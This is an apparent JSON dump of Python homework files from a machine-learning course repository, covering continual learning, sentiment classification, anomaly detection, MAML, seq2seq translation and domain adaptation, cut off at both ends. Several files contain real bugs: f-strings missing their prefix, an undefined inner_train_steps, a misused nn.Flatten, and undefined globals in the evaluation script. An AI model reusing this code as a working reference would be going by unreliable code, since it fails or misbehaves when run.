StopIteration:\r\n it = iter(self.train_loader)\r\n"
},
{
"alpha_fraction": 0.4812791645526886,
"alphanum_fraction": 0.4908387362957001,
"avg_line_length": 37.554054260253906,
"blob_id": "e69e5f7dc4e7e351e6b27e2955434ecfdf1fdd29",
"content_id": "b58d0e58a507ab4aa4eded9870216c92033a1012",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8903,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 222,
"path": "/hw14_life_long_learning/train.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import json\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nfrom hw14_life_long_learning.EWC import EWC\r\nfrom hw14_life_long_learning.MAS import MAS\r\nfrom hw14_life_long_learning.config import configurations\r\nfrom hw14_life_long_learning.utils import save_model, build_model, load_model\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n\r\ndef normal_train(model, optimizer, task, total_epochs, summary_epochs):\r\n model.train()\r\n model.zero_grad()\r\n ceriation = nn.CrossEntropyLoss()\r\n losses = []\r\n loss = 0.0\r\n for epoch in range(summary_epochs):\r\n imgs, labels = next(task.train_iter)\r\n imgs, labels = imgs.to(device), labels.to(device)\r\n outputs = model(imgs)\r\n ce_loss = ceriation(outputs, labels)\r\n\r\n optimizer.zero_grad()\r\n ce_loss.backward()\r\n optimizer.step()\r\n\r\n loss += ce_loss.item()\r\n if (epoch + 1) % 50 == 0:\r\n loss = loss / 50\r\n print(\"\\r\", \"train task {} [{}] loss: {:.3f} \".format(task.name, (total_epochs + epoch + 1), loss),\r\n end=\" \")\r\n losses.append(loss)\r\n loss = 0.0\r\n\r\n return model, optimizer, losses\r\n\r\n\r\ndef ewc_train(model, optimizer, task, total_epochs, summary_epochs, ewc, lambda_ewc):\r\n model.train()\r\n model.zero_grad()\r\n ceriation = nn.CrossEntropyLoss()\r\n losses = []\r\n loss = 0.0\r\n for epoch in range(summary_epochs):\r\n imgs, labels = next(task.train_iter)\r\n imgs, labels = imgs.to(device), labels.to(device)\r\n outputs = model(imgs)\r\n ce_loss = ceriation(outputs, labels)\r\n total_loss = ce_loss\r\n ewc_loss = ewc.penalty(model)\r\n total_loss += lambda_ewc * ewc_loss\r\n\r\n optimizer.zero_grad()\r\n total_loss.backward()\r\n optimizer.step()\r\n\r\n loss += total_loss.item()\r\n if (epoch + 1) % 50 == 0:\r\n loss = loss / 50\r\n print(\"\\r\", \"train task {} [{}] loss: {:.3f} \".format(task.name, (total_epochs + epoch + 1), loss),\r\n end=\" \")\r\n losses.append(loss)\r\n loss = 0.0\r\n\r\n return model, optimizer, losses\r\n\r\n\r\ndef mas_train(model, optimizer, task, total_epochs, summary_epochs, mas_tasks, lambda_mas, alpha=0.8):\r\n model.train()\r\n model.zero_grad()\r\n ceriation = nn.CrossEntropyLoss()\r\n losses = []\r\n loss = 0.0\r\n for epoch in range(summary_epochs):\r\n imgs, labels = next(task.train_iter)\r\n imgs, labels = imgs.to(device), labels.to(device)\r\n outputs = model(imgs)\r\n ce_loss = ceriation(outputs, labels)\r\n total_loss = ce_loss\r\n mas_tasks.reverse()\r\n if len(mas_tasks) > 1:\r\n preprevious = 1 - alpha\r\n scalars = [alpha, preprevious]\r\n for mas, scalar in zip(mas_tasks[:2], scalars):\r\n mas_loss = mas.penalty(model)\r\n total_loss += lambda_mas * mas_loss * scalar\r\n elif len(mas_tasks) == 1:\r\n mas_loss = mas_tasks[0].penalty(model)\r\n total_loss += lambda_mas * mas_loss\r\n else:\r\n pass\r\n\r\n optimizer.zero_grad()\r\n total_loss.backward()\r\n optimizer.step()\r\n\r\n loss += total_loss.item()\r\n if (epoch + 1) % 50 == 0:\r\n loss = loss / 50\r\n print(\"\\r\", \"train task {} [{}] loss: {:.3f} \".format(task.name, (total_epochs + epoch + 1), loss),\r\n end=\" \")\r\n losses.append(loss)\r\n loss = 0.0\r\n\r\n return model, optimizer, losses\r\n\r\n\r\ndef val(model, task):\r\n model.eval()\r\n correct_cnt = 0\r\n for imgs, labels in task.val_loader:\r\n imgs, labels = imgs.to(device), labels.to(device)\r\n outputs = model(imgs)\r\n _, pred_label = torch.max(outputs.data, 1)\r\n\r\n correct_cnt += (pred_label == labels.data).sum().item()\r\n\r\n return correct_cnt / task.val_dataset_size\r\n\r\n\r\ndef train_process(model, optimizer, tasks, config):\r\n task_loss, acc = {}, {}\r\n for task_id, task in enumerate(tasks):\r\n print('\\n')\r\n total_epochs = 0\r\n task_loss[task.name] = []\r\n acc[task.name] = []\r\n if config.mode == 'basic' or task_id == 0:\r\n while (total_epochs < config.num_epochs):\r\n model, optimizer, losses = normal_train(model, optimizer, task, total_epochs, config.summary_epochs)\r\n task_loss[task.name] += losses\r\n\r\n for subtask in range(task_id + 1):\r\n acc[tasks[subtask].name].append(val(model, tasks[subtask]))\r\n\r\n total_epochs += config.summary_epochs\r\n if total_epochs % config.store_epochs == 0 or total_epochs >= config.num_epochs:\r\n save_model(model, optimizer, config.store_model_path)\r\n\r\n if config.mode == 'ewc' and task_id > 0:\r\n old_dataloaders = []\r\n for old_task in range(task_id):\r\n old_dataloaders += [tasks[old_task].val_loader]\r\n ewc = EWC(model, old_dataloaders, device)\r\n while (total_epochs < config.num_epochs):\r\n model, optimizer, losses = ewc_train(model, optimizer, task, total_epochs, config.summary_epochs, ewc,\r\n config.lifelong_coeff)\r\n task_loss[task.name] += losses\r\n\r\n for subtask in range(task_id + 1):\r\n acc[tasks[subtask].name].append(val(model, tasks[subtask]))\r\n\r\n total_epochs += config.summary_epochs\r\n if total_epochs % config.store_epochs == 0 or total_epochs >= config.num_epochs:\r\n save_model(model, optimizer, config.store_model_path)\r\n\r\n if config.mode == 'mas' and task_id > 0:\r\n old_dataloaders = []\r\n mas_tasks = []\r\n for old_task in range(task_id):\r\n old_dataloaders += [tasks[old_task].val_loader]\r\n mas = MAS(model, old_dataloaders, device)\r\n mas_tasks += [mas]\r\n while (total_epochs < config.num_epochs):\r\n model, optimizer, losses = mas_train(model, optimizer, task, total_epochs, config.summary_epochs,\r\n mas_tasks, config.lifelong_coeff)\r\n task_loss[task.name] += losses\r\n\r\n for subtask in range(task_id + 1):\r\n acc[tasks[subtask].name].append(val(model, tasks[subtask]))\r\n\r\n total_epochs += config.summary_epochs\r\n if total_epochs % config.store_epochs == 0 or total_epochs >= config.num_epochs:\r\n save_model(model, optimizer, config.store_model_path)\r\n\r\n if config.mode == 'scp' and task_id > 0:\r\n pass\r\n ########################################\r\n ## TODO 區塊 ( PART 2 ) ##\r\n ########################################\r\n ## PART 2 implementation 的部份 ##\r\n ## 你也可以寫別的 regularization 方法 ##\r\n ## 助教這裡有提供的是 scp 的 作法 ##\r\n ## Slicer Cramer Preservation ##\r\n ########################################\r\n ########################################\r\n ## TODO 區塊 ( PART 2 ) ##\r\n ########################################\r\n return task_loss, acc\r\n\r\n\r\n\"\"\"\r\nthe order is svhn -> mnist -> usps\r\n\"\"\"\r\nif __name__ == '__main__':\r\n mode_list = ['mas', 'ewc', 'basic']\r\n\r\n ## hint: 謹慎的去選擇 lambda 超參數 / ewc: 80~400, mas: 0.1 - 10\r\n ############################################################################\r\n ##### TODO 區塊 ( PART 1 ) #####\r\n ############################################################################\r\n coeff_list = [0, 0, 0] ## 你需要在這 微調 lambda 參數, mas, ewc, baseline=0##\r\n ############################################################################\r\n ##### TODO 區塊 ( PART 1 ) #####\r\n ############################################################################\r\n\r\n config = configurations()\r\n count = 0\r\n for mode in mode_list:\r\n config.mode = mode\r\n config.lifelong_coeff = coeff_list[count]\r\n print(\"{} training\".format(config.mode))\r\n model, optimizer, tasks = build_model(config.load_model_path, config.batch_size, config.learning_rate)\r\n print(\"Finish build model\")\r\n if config.load_model:\r\n model, optimizer = load_model(model, optimizer, config.load_model_path)\r\n task_loss, acc = train_process(model, optimizer, tasks, config)\r\n with open('./{config.mode}_acc.txt', 'w') as f:\r\n json.dump(acc, f)\r\n count += 1\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6200191378593445,
"alphanum_fraction": 0.6388269066810608,
"avg_line_length": 42.18309783935547,
"blob_id": "49e1926cd97f10ac93b5cc25cd90944e36c8c444",
"content_id": "39aa222a4f572422e50797551eea2b5bc4aa4349",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3587,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 71,
"path": "/hw4RNN/main.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import os\r\nimport torch\r\nfrom hw4RNN.data import TwitterDataset\r\nfrom hw4RNN.model import LSTM_Net\r\nfrom hw4RNN.preprocess import Preprocess\r\nfrom hw4RNN.train import training\r\nfrom hw4RNN.utils import load_training_data\r\n\r\n# 本次作業是NLP當中一個簡單的task——句子分類(文本分類)\r\n# 給定一個句子,判斷他有沒有惡意(負面標1,正面標0)\r\n# 数据集有三個檔案,分別是training_label.txt、training_nolabel.txt、testing_data.txt\r\n# training_label.txt:有label的training data(句子配上0 or 1)\r\n# training_nolabel.txt:沒有label的training data(只有句子),用來做semi-supervise learning\r\n# testing_data.txt:你要判斷testing data裡面的句子是0 or 1\r\n\r\n\r\nif __name__ == '__main__':\r\n path_prefix = './'\r\n # 通過torch.cuda.is_available()的回傳值進行判斷是否有使用GPU的環境,如果有的話device就設為\"cuda\",沒有的話就設為\"cpu\"\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n # 處理好各個data的路徑\r\n train_with_label = os.path.join(path_prefix, 'training_label.txt')\r\n train_no_label = os.path.join(path_prefix, 'training_nolabel.txt')\r\n testing_data = os.path.join(path_prefix, 'testing_data.txt')\r\n\r\n w2v_path = os.path.join(path_prefix, 'w2v_all.model') # 處理word to vec model的路徑\r\n\r\n # 定義句子長度、要不要固定embedding、batch大小、要訓練幾個epoch、learning rate的值、model的資料夾路徑\r\n sen_len = 30\r\n fix_embedding = True # fix embedding during training\r\n batch_size = 2\r\n epoch = 5\r\n lr = 0.001\r\n # model_dir = os.path.join(path_prefix, 'model/') # model directory for checkpoint model\r\n model_dir = path_prefix # model directory for checkpoint model\r\n\r\n print(\"loading data ...\") # 把'training_label.txt'跟'training_nolabel.txt'讀進來\r\n train_x, y = load_training_data(train_with_label)\r\n train_x_no_label = load_training_data(train_no_label)\r\n\r\n # 對input跟labels做預處理\r\n preprocess = Preprocess(train_x, sen_len, w2v_path=w2v_path)\r\n embedding = preprocess.make_embedding(load=True)\r\n train_x = preprocess.sentence_word2idx()\r\n y = preprocess.labels_to_tensor(y)\r\n\r\n # 製作一個model的對象\r\n model = LSTM_Net(embedding, embedding_dim=250, hidden_dim=250, num_layers=1, dropout=0.5, fix_embedding=fix_embedding)\r\n model = model.to(device) # device為\"cuda\",model使用GPU來訓練(餵進去的inputs也需要是cuda tensor)\r\n\r\n # 把data分為training data跟validation data(將一部份training data拿去當作validation data)\r\n X_train, X_val, y_train, y_val = train_x[:190000], train_x[190000:], y[:190000], y[190000:]\r\n\r\n # 把data做成dataset供dataloader取用\r\n train_dataset = TwitterDataset(X=X_train, y=y_train)\r\n val_dataset = TwitterDataset(X=X_val, y=y_val)\r\n\r\n # 把data 轉成 batch of tensors\r\n train_loader = torch.utils.data.DataLoader(dataset = train_dataset,\r\n batch_size = batch_size,\r\n shuffle = True,\r\n num_workers = 0)\r\n\r\n val_loader = torch.utils.data.DataLoader(dataset = val_dataset,\r\n batch_size = batch_size,\r\n shuffle = False,\r\n num_workers = 0)\r\n\r\n # 開始訓練\r\n training(batch_size, epoch, lr, model_dir, train_loader, val_loader, model, device)\r\n"
},
{
"alpha_fraction": 0.6041666865348816,
"alphanum_fraction": 0.6116898059844971,
"avg_line_length": 34.76595687866211,
"blob_id": "a7af9b80a07026200ec24b3fbeef4c6bf215fe1b",
"content_id": "f18994de37cd30121b53ad1625591e4445305278",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1838,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 47,
"path": "/hw10_anomaly_detection/evaluation.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import torch\r\nfrom torch.utils.data.dataloader import DataLoader\r\nfrom torch.utils.data.dataset import TensorDataset\r\nfrom torch.utils.data.sampler import SequentialSampler\r\nimport numpy as np\r\n\r\n\r\n# 將testing的圖片輸入model後,可以得到其重建的圖片,並對兩者取平方差。\r\n# 可以發現inlier的平方差應該與outlier的平方差形成差距明顯的兩群數據。\r\n\r\nif task == 'ae':\r\n if model_type == 'fcn' or model_type == 'vae':\r\n y = test.reshape(len(test_tmp), -1)\r\n else:\r\n y = test\r\n\r\n data = torch.tensor(y, dtype=torch.float)\r\n test_dataset = TensorDataset(data)\r\n test_sampler = SequentialSampler(test_dataset)\r\n test_dataloader = DataLoader(test_dataset, sampler=test_sampler, batch_size=batch_size)\r\n\r\n model = torch.load('best_model_{}.pt'.format(model_type), map_location='cuda')\r\n\r\n model.eval()\r\n reconstructed = list()\r\n for i, data in enumerate(test_dataloader):\r\n if model_type == 'cnn':\r\n img = data[0].transpose(3, 1).cuda()\r\n else:\r\n img = data[0].cuda()\r\n output = model(img)\r\n if model_type == 'cnn':\r\n output = output.transpose(3, 1)\r\n elif model_type == 'vae':\r\n output = output[0]\r\n reconstructed.append(output.cpu().detach().numpy())\r\n\r\n reconstructed = np.concatenate(reconstructed, axis=0)\r\n anomality = np.sqrt(np.sum(np.square(reconstructed - y).reshape(len(y), -1), axis=1))\r\n y_pred = anomality\r\n with open('prediction.csv', 'w') as f:\r\n f.write('id,anomaly\\n')\r\n for i in range(len(y_pred)):\r\n f.write('{},{}\\n'.format(i + 1, y_pred[i]))\r\n # score = roc_auc_score(y_label, y_pred, average='micro')\r\n # score = f1_score(y_label, y_pred, average='micro')\r\n # print('auc score: {}'.format(score))\r\n"
},
{
"alpha_fraction": 0.567685604095459,
"alphanum_fraction": 0.580058217048645,
"avg_line_length": 30.714284896850586,
"blob_id": "19f09081d349339974ef9df3ecbe2ade1b03257e",
"content_id": "6b17ca79d87312fd0cd726b317640149279a7c01",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1504,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 42,
"path": "/hw4RNN/utils.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# utils.py\r\n# 這個block用來先定義一些等等常用到的函式\r\nimport torch\r\nimport numpy as np\r\nimport pandas as pd\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\n\r\n\r\ndef load_training_data(path='./training_label.txt'):\r\n # 把training時需要的data讀進來\r\n # 如果是'training_label.txt',需要讀取label,如果是'training_nolabel.txt',不需要讀取label\r\n if 'training_label' in path:\r\n with open(path, 'r', encoding='UTF-8') as f:\r\n lines = f.readlines()\r\n lines = [line.strip('\\n').split(' ') for line in lines]\r\n x = [line[2:] for line in lines]\r\n y = [line[0] for line in lines]\r\n return x, y\r\n else:\r\n with open(path, 'r', encoding='UTF-8') as f:\r\n lines = f.readlines()\r\n x = [line.strip('\\n').split(' ') for line in lines]\r\n return x\r\n\r\n\r\ndef load_testing_data(path='./testing_data.txt'):\r\n # 把testing時需要的data讀進來\r\n with open(path, 'r', encoding='UTF-8') as f:\r\n lines = f.readlines()\r\n X = [\"\".join(line.strip('\\n').split(\",\")[1:]).strip() for line in lines[1:]]\r\n X = [sen.split(' ') for sen in X]\r\n return X\r\n\r\n\r\ndef evaluation(outputs, labels):\r\n #outputs => probability (float)\r\n #labels => labels\r\n outputs[outputs >= 0.5] = 1 # 大於等於0.5為有惡意\r\n outputs[outputs < 0.5] = 0 # 小於0.5為無惡意\r\n correct = torch.sum(torch.eq(outputs, labels)).item()\r\n return correct\r\n"
},
{
"alpha_fraction": 0.5660864114761353,
"alphanum_fraction": 0.5804857015609741,
"avg_line_length": 39.1769905090332,
"blob_id": "7abc8fc091c3266844c0b9d27e694c292b28566e",
"content_id": "1aadb2ab8021d9b61cfe07ba98c8bcf34d799bd0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5174,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 113,
"path": "/hw13_meta_learning/model.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torch.utils.data import DataLoader, Dataset\r\nimport torchvision.transforms as transforms\r\nimport glob\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nfrom collections import OrderedDict\r\n\r\n\r\ndef ConvBlock(in_ch, out_ch):\r\n return nn.Sequential(nn.Conv2d(in_ch, out_ch, 3, padding=1),\r\n nn.BatchNorm2d(out_ch),\r\n nn.ReLU(),\r\n nn.MaxPool2d(kernel_size=2, stride=2)) # 原作者在 paper 裡是說她在 omniglot 用的是 strided convolution\r\n # 不過這裡我改成 max pool (mini imagenet 才是 max pool)\r\n # 這並不是你們在 report 第三題要找的 tip\r\n\r\n\r\ndef ConvBlockFunction(x, w, b, w_bn, b_bn):\r\n x = F.conv2d(x, w, b, padding=1)\r\n x = F.batch_norm(x, running_mean=None, running_var=None, weight=w_bn, bias=b_bn, training=True)\r\n x = F.relu(x)\r\n x = F.max_pool2d(x, kernel_size=2, stride=2)\r\n return x\r\n\r\n\r\nclass Classifier(nn.Module):\r\n def __init__(self, in_ch, k_way):\r\n super(Classifier, self).__init__()\r\n self.conv1 = ConvBlock(in_ch, 64)\r\n self.conv2 = ConvBlock(64, 64)\r\n self.conv3 = ConvBlock(64, 64)\r\n self.conv4 = ConvBlock(64, 64)\r\n self.logits = nn.Linear(64, k_way)\r\n\r\n def forward(self, x):\r\n x = self.conv1(x)\r\n x = self.conv2(x)\r\n x = self.conv3(x)\r\n x = self.conv4(x)\r\n x = nn.Flatten(x)\r\n x = self.logits(x)\r\n return x\r\n\r\n def functional_forward(self, x, params):\r\n '''\r\n Arguments:\r\n x: input images [batch, 1, 28, 28]\r\n params: 模型的參數,也就是 convolution 的 weight 跟 bias,以及 batchnormalization 的 weight 跟 bias\r\n 這是一個 OrderedDict\r\n '''\r\n for block in [1, 2, 3, 4]:\r\n x = ConvBlockFunction(x, params['conv{block}.0.weight'], params[f'conv{block}.0.bias'],\r\n params.get('conv{block}.1.weight'), params.get(f'conv{block}.1.bias'))\r\n x = x.view(x.shape[0], -1)\r\n x = F.linear(x, params['logits.weight'], params['logits.bias'])\r\n return x\r\n\r\n\r\ndef create_label(n_way, k_shot):\r\n return torch.arange(n_way).repeat_interleave(k_shot).long()\r\n\r\n\r\n# 我們試著產生 5 way 2 shot 的 label 看看\r\n# create_label(5, 2)\r\n\r\ndef MAML(model, optimizer, x, n_way, k_shot, q_query, loss_fn, inner_train_step=1, inner_lr=0.4, train=True):\r\n \"\"\"\r\n Args:\r\n x is the input omniglot images for a meta_step, shape = [batch_size, n_way * (k_shot + q_query), 1, 28, 28]\r\n n_way: 每個分類的 task 要有幾個 class\r\n k_shot: 每個類別在 training 的時候會有多少張照片\r\n q_query: 在 testing 時,每個類別會用多少張照片 update\r\n \"\"\"\r\n criterion = loss_fn\r\n task_loss = [] # 這裡面之後會放入每個 task 的 loss\r\n task_acc = [] # 這裡面之後會放入每個 task 的 loss\r\n for meta_batch in x:\r\n train_set = meta_batch[:n_way * k_shot] # train_set 是我們拿來 update inner loop 參數的 data\r\n val_set = meta_batch[n_way * k_shot:] # val_set 是我們拿來 update outer loop 參數的 data\r\n\r\n fast_weights = OrderedDict(\r\n model.named_parameters()) # 在 inner loop update 參數時,我們不能動到實際參數,因此用 fast_weights 來儲存新的參數 θ'\r\n\r\n for inner_step in range(inner_train_steps): # 這個 for loop 是 Algorithm2 的 line 7~8\r\n # 實際上我們 inner loop 只有 update 一次 gradients,不過某些 task 可能會需要多次 update inner loop 的 θ',\r\n # 所以我們還是用 for loop 來寫\r\n train_label = create_label(n_way, k_shot).cuda()\r\n logits = model.functional_forward(train_set, fast_weights)\r\n loss = criterion(logits, train_label)\r\n grads = torch.autograd.grad(loss, fast_weights.values(),\r\n create_graph=True) # 這裡是要計算出 loss 對 θ 的微分 (∇loss)\r\n fast_weights = OrderedDict((name, param - inner_lr * grad)\r\n for ((name, param), grad) in\r\n zip(fast_weights.items(), grads)) # 這裡是用剛剛算出的 ∇loss 來 update θ 變成 θ'\r\n\r\n val_label = create_label(n_way, q_query).cuda()\r\n logits = model.functional_forward(val_set, fast_weights) # 這裡用 val_set 和 θ' 算 logit\r\n loss = criterion(logits, val_label) # 這裡用 val_set 和 θ' 算 loss\r\n task_loss.append(loss) # 把這個 task 的 loss 丟進 task_loss 裡面\r\n acc = np.asarray([torch.argmax(logits, -1).cpu().numpy() == val_label.cpu().numpy()]).mean() # 算 accuracy\r\n task_acc.append(acc)\r\n\r\n model.train()\r\n optimizer.zero_grad()\r\n meta_batch_loss = torch.stack(task_loss).mean() # 我們要用一整個 batch 的 loss 來 update θ (不是 θ')\r\n if train:\r\n meta_batch_loss.backward()\r\n optimizer.step()\r\n task_acc = np.mean(task_acc)\r\n return meta_batch_loss, task_acc\r\n"
},
{
"alpha_fraction": 0.5960058569908142,
"alphanum_fraction": 0.6068156957626343,
"avg_line_length": 34.61745071411133,
"blob_id": "610974a9a124caa9a3fe4f986a688f51eafc3352",
"content_id": "e3ed69988a78192bcf0f66e34411403f972fc2b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5610,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 149,
"path": "/hw8_seq2seq/main.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\nimport torch.utils.data as data\r\nimport torch.utils.data.sampler as sampler\r\nimport torchvision\r\nfrom torchvision import datasets, transforms\r\nimport numpy as np\r\nimport sys\r\nimport os\r\nimport random\r\nimport json\r\nimport matplotlib.pyplot as plt\r\nfrom hw8_seq2seq.config import configurations\r\nfrom hw8_seq2seq.data import EN2CNDataset\r\nfrom hw8_seq2seq.utils import build_model\r\nfrom hw8_seq2seq.utils import save_model\r\nfrom hw8_seq2seq.utils import schedule_sampling\r\nfrom hw8_seq2seq.utils import tokens2sentence, computebleu, infinite_iter\r\n\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") # 判斷是用 CPU 還是 GPU 執行運算\r\n\r\n\r\ndef train(model, optimizer, train_iter, loss_function, total_steps, summary_steps, train_dataset):\r\n model.train()\r\n model.zero_grad()\r\n losses = []\r\n loss_sum = 0.0\r\n for step in range(summary_steps):\r\n sources, targets = next(train_iter)\r\n sources, targets = sources.to(device), targets.to(device)\r\n outputs, preds = model(sources, targets, schedule_sampling())\r\n # targets 的第一個 token 是 <BOS> 所以忽略\r\n outputs = outputs[:, 1:].reshape(-1, outputs.size(2))\r\n targets = targets[:, 1:].reshape(-1)\r\n loss = loss_function(outputs, targets)\r\n\r\n optimizer.zero_grad()\r\n loss.backward()\r\n grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), 1)\r\n optimizer.step()\r\n\r\n loss_sum += loss.item()\r\n if (step + 1) % 5 == 0:\r\n loss_sum = loss_sum / 5\r\n print(\"\\r\", \"train [{}] loss: {:.3f}, Perplexity: {:.3f} \".format(total_steps + step + 1, loss_sum, np.exp(loss_sum)), end=\" \")\r\n losses.append(loss_sum)\r\n loss_sum = 0.0\r\n\r\n return model, optimizer, losses\r\n\r\n\r\ndef test(model, dataloader, loss_function):\r\n model.eval()\r\n loss_sum, bleu_score = 0.0, 0.0\r\n n = 0\r\n result = []\r\n for sources, targets in dataloader:\r\n sources, targets = sources.to(device), targets.to(device)\r\n batch_size = sources.size(0)\r\n outputs, preds = model.inference(sources, targets)\r\n # targets 的第一個 token 是 <BOS> 所以忽略\r\n outputs = outputs[:, 1:].reshape(-1, outputs.size(2))\r\n targets = targets[:, 1:].reshape(-1)\r\n\r\n loss = loss_function(outputs, targets)\r\n loss_sum += loss.item()\r\n\r\n # 將預測結果轉為文字\r\n targets = targets.view(sources.size(0), -1)\r\n preds = tokens2sentence(preds, dataloader.dataset.int2word_cn)\r\n sources = tokens2sentence(sources, dataloader.dataset.int2word_en)\r\n targets = tokens2sentence(targets, dataloader.dataset.int2word_cn)\r\n for source, pred, target in zip(sources, preds, targets):\r\n result.append((source, pred, target))\r\n # 計算 Bleu Score\r\n bleu_score += computebleu(preds, targets)\r\n\r\n n += batch_size\r\n\r\n return loss_sum / len(dataloader), bleu_score / n, result\r\n\r\n\r\ndef train_process(config):\r\n # 準備訓練資料\r\n train_dataset = EN2CNDataset(config.data_path, config.max_output_len, 'training')\r\n train_loader = data.DataLoader(train_dataset, batch_size=config.batch_size, shuffle=True)\r\n train_iter = infinite_iter(train_loader)\r\n # 準備檢驗資料\r\n val_dataset = EN2CNDataset(config.data_path, config.max_output_len, 'validation')\r\n val_loader = data.DataLoader(val_dataset, batch_size=1)\r\n # 建構模型\r\n model, optimizer = build_model(config, train_dataset.en_vocab_size, train_dataset.cn_vocab_size)\r\n loss_function = nn.CrossEntropyLoss(ignore_index=0)\r\n\r\n train_losses, val_losses, bleu_scores = [], [], []\r\n total_steps = 0\r\n while (total_steps < config.num_steps):\r\n # 訓練模型\r\n model, optimizer, loss = train(model, optimizer, train_iter, loss_function, total_steps, config.summary_steps,\r\n train_dataset)\r\n train_losses += loss\r\n # 檢驗模型\r\n val_loss, bleu_score, result = test(model, val_loader, loss_function)\r\n val_losses.append(val_loss)\r\n bleu_scores.append(bleu_score)\r\n\r\n total_steps += config.summary_steps\r\n print(\"\\r\", \"val [{}] loss: {:.3f}, Perplexity: {:.3f}, blue score: {:.3f} \".format(total_steps, val_loss,\r\n np.exp(val_loss),\r\n bleu_score))\r\n\r\n # 儲存模型和結果\r\n if total_steps % config.store_steps == 0 or total_steps >= config.num_steps:\r\n save_model(model, optimizer, config.store_model_path, total_steps)\r\n with open('{config.store_model_path}/output_{total_steps}.txt', 'w') as f:\r\n for line in result:\r\n print(line, file=f)\r\n\r\n return train_losses, val_losses, bleu_scores\r\n\r\n\r\nif __name__ == '__main__':\r\n config = configurations()\r\n print('config:\\n', vars(config))\r\n train_losses, val_losses, bleu_scores = train_process(config)\r\n\r\n plt.figure()\r\n plt.plot(train_losses)\r\n plt.xlabel('次數')\r\n plt.ylabel('loss')\r\n plt.title('train loss')\r\n plt.show()\r\n\r\n plt.figure()\r\n plt.plot(val_losses)\r\n plt.xlabel('次數')\r\n plt.ylabel('loss')\r\n plt.title('validation loss')\r\n plt.show()\r\n\r\n plt.figure()\r\n plt.plot(bleu_scores)\r\n plt.xlabel('次數')\r\n plt.ylabel('BLEU score')\r\n plt.title('BLEU score')\r\n plt.show()\r\n\r\n"
},
{
"alpha_fraction": 0.6327048540115356,
"alphanum_fraction": 0.6488397121429443,
"avg_line_length": 39.787879943847656,
"blob_id": "b867e5564947b2c682fcadeb155a9a96eac4b587",
"content_id": "032afb1eb08c771d99d21765e69a1f57b2c90cb7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6214,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 132,
"path": "/hw12_domain_adaptation/train.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n如何實作DaNN?\r\n理論上,在原始paper中是加上Gradient Reversal Layer,並將Feature Extractor / Label Predictor / Domain Classifier 一起train,\r\n但其實我們也可以交換的train Domain Classfier & Feature Extractor(就像在train GAN的Generator & Discriminator一樣),這也是可行的。\r\n在code實現中,我們採取後者的方式,畢竟大家上個作業就是GAN,應該會比較熟悉:)。\r\n小提醒:\r\n原文中的lambda(控制Domain Adversarial Loss的係數)是有Adaptive的版本,如果有興趣可以參考原文。以下為了方便固定設置0.1。\r\n因為我們完全沒有target的label,所以結果如何,只好丟kaggle看看囉:)?\r\n\"\"\"\r\nimport torch\r\nfrom hw12_domain_adaptation.model import FeatureExtractor, LabelPredictor, DomainClassifier\r\nfrom torch import nn, optim\r\nimport cv2\r\nimport numpy as np\r\nimport torchvision.transforms as transforms\r\nfrom torch.utils.data import DataLoader\r\nfrom torchvision.datasets import ImageFolder\r\n\r\n\r\ndef train_epoch(source_dataloader, target_dataloader, lamb):\r\n '''\r\n Args:\r\n source_dataloader: source data的dataloader\r\n target_dataloader: target data的dataloader\r\n lamb: 調控adversarial的loss係數。\r\n '''\r\n\r\n # D loss: Domain Classifier的loss\r\n # F loss: Feature Extrator & Label Predictor的loss\r\n # total_hit: 計算目前對了幾筆 total_num: 目前經過了幾筆\r\n running_D_loss, running_F_loss = 0.0, 0.0\r\n total_hit, total_num = 0.0, 0.0\r\n\r\n for i, ((source_data, source_label), (target_data, _)) in enumerate(zip(source_dataloader, target_dataloader)):\r\n source_data = source_data.cuda()\r\n source_label = source_label.cuda()\r\n target_data = target_data.cuda()\r\n\r\n # 我們把source data和target data混在一起,否則batch_norm可能會算錯 (兩邊的data的mean/var不太一樣)\r\n mixed_data = torch.cat([source_data, target_data], dim=0)\r\n domain_label = torch.zeros([source_data.shape[0] + target_data.shape[0], 1]).cuda()\r\n # 設定source data的label為1\r\n domain_label[:source_data.shape[0]] = 1\r\n\r\n # Step 1 : 訓練Domain Classifier\r\n feature = feature_extractor(mixed_data)\r\n # 因為我們在Step 1不需要訓練Feature Extractor,所以把feature detach避免loss backprop上去。\r\n domain_logits = domain_classifier(feature.detach())\r\n loss = domain_criterion(domain_logits, domain_label)\r\n running_D_loss 